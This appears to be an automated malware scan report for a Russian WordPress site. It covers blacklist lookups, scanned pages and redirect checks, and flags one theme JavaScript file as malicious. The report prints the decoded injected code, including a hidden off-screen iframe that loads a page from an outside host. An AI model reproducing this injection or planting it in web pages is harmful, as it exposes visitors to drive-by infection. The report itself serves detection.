Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=1wmrbux.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://1wmrbux.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://1wmrbux.ru/ | 200 OK Content-Length: 35121 Content-Type: text/html | clean |
http://1wmrbux.ru/wp-content/themes/cellular-phone-theme_2/script.js | 200 OK Content-Length: 10369 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre artEventHelper.bind(button, 'mouseup', function(e) { e = e || window.event; button = e.target || e.srcElement; wrapper = button.parentNode; if (!artHasClass(button, 'active')) wrapper.className = wrapper.className.replace(/active/, ""); }); } } } artLoadEvent.add(function() { artButtonsSetupJsHover("art-button"); }); artLoadEvent.add(function() { artButtonsSetupJsHover("button"); }); Decoded script: function () { try { document.documentElement.doScroll("left"); } catch (e) { setTimeout(arguments.callee, 10); return; } ready(); } /*** called setTimeout with function () { try { document.documentElement.doScroll("left"); } catch (e) { setTimeout(arguments.callee, 10); return; } ready(); }, 10 */ function () { if (done) { return; } done = true; for (var i = 0; i < list.length; i++) { list[i](); } } <iframe src="http://Internet.sololineas.com/dfgatrsjygfhsrtjs12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://1wmrbux.ru/kak-vybirat-avtomobil/ | 200 OK Content-Length: 16803 Content-Type: text/html | clean |
http://1wmrbux.ru/opisanie-i-xarakteristiki-modeli-noutbuka-macbook-pro-mc975/ | 200 OK Content-Length: 18279 Content-Type: text/html | clean |
http://1wmrbux.ru/shirokimi-vozmozhnostyami/ | 200 OK Content-Length: 16370 Content-Type: text/html | clean |
http://1wmrbux.ru/ostalos-nam-razobrat/ | 200 OK Content-Length: 15353 Content-Type: text/html | clean |
http://1wmrbux.ru/prilozhennoe-napryazhenie/ | 200 OK Content-Length: 15101 Content-Type: text/html | clean |
http://1wmrbux.ru/posle-otkrytiya-tranzistora/ | 200 OK Content-Length: 16053 Content-Type: text/html | clean |
http://1wmrbux.ru/rezistor-r1/ | 200 OK Content-Length: 16209 Content-Type: text/html | clean |
http://1wmrbux.ru/vtoraya-sxema-imitiruet-preryvistyj-gudok/ | 200 OK Content-Length: 16608 Content-Type: text/html | clean |
http://1wmrbux.ru/cel-opytov/ | 200 OK Content-Length: 15718 Content-Type: text/html | clean |
http://1wmrbux.ru/impuls-na-vyxode/ | 200 OK Content-Length: 16712 Content-Type: text/html | clean |
http://1wmrbux.ru/nagruzochnuyu-sposobnost/ | 200 OK Content-Length: 15795 Content-Type: text/html | clean |
http://1wmrbux.ru/logicheskij-uroven/ | 200 OK Content-Length: 16904 Content-Type: text/html | clean |
http://1wmrbux.ru/pri-otsutstvii-vneshnego-elektricheskogo-polya/ | 200 OK Content-Length: 17224 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 1wmrbux.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 11:12:21 GMT
Server: nginx/1.4.3
Content-Type: text/html; charset=UTF-8
X-Pingback: http://1wmrbux.ru/xmlrpc.php
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: 1wmrbux.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 11:12:21 GMT
Server: nginx/1.4.3
Content-Type: text/html; charset=UTF-8
X-Pingback: http://1wmrbux.ru/xmlrpc.php
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: 1wmrbux.ru
Referer: http://www.google.com/search?q=1wmrbux.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 1wmrbux.ru
Referer: http://www.google.com/search?q=1wmrbux.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.